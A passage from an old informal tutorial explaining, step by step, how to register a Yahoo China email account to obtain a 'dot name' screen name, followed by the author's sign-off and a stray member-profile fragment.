Chinese, which you will probably not understand, so I will briefly
describe the steps so that you can create your own accounts with the
language barrier. You will first off see a field that looks something
like this....
[ ]@yahoo.com.cn
This is where you will want to type the name that you are interested in
having. Then below it you will see a bar with a series of tabs from
A-F to X-Z. Upon clicking on one of these tabs you will see a list of
possible surnames to append to your screen name. Lets say that in the
field above we put in "nirvana", then if we clicked on the A-F tab, we
could select a surname like "fan". Once you have clicked this surname
then you should notice that the name listed above has changed to
"nirvana.fan". Now we will simply scroll down and click the blue button
at the bottom. If the name is taken then it will take us back to the
beginning to choose another names, if not, then we should now be at the
registration form. The first two fields below our selected screen name
will be the password fields. So of course in these two fields we will
simply type in the password that we want for the chosen account. Below
this will be the secret question, so just choose a random question, and
on the field below it type in a random answer to this question. Then
of course below that is your birthday, which needs no explanation.
Now below that you will see two smaller fields side by side. This of
course is your first and last name, so go ahead and put that information
in. Then on the field below it on the left side is the zip code. In
this field just type in any 6 digit number, for example "111111". Then
the field beside it is your sex, so just choose the top if your male,
bottom if you're female. Then of course at the field below it type in
the number that you see in the picture below and click on the blue
button at the bottom of the form, and there you go. Now you have your
very own dot name. Please take note that this method is not exactly
secret information, and most people have heard of the method, and many
you will see have already created their own dot names. So don't try
to throw it around like it's an illegal account.
Section 5: Conclusion
----------------------
Well that concludes it for yet another tutorial written by your's
truly. If I feel the need to, I may add yet another installment to this
tutorial sometime in the future, but don't expect it any time soon.
Still, hope you enjoyed the tutorial. Until next time...
Note: If you have any questions or comments and feel the need to reach
me then you can do so at protonigg3r@yahoo.com and I will try to get
back with you as soon as possible.
joseph_tabangay
-
- Name: joseph
- Gender: Male
- Member Since: 10/24/2007
Connect
About Me
-
im very much interested about internet,i want to know all things that i donot know
Chatboard (3)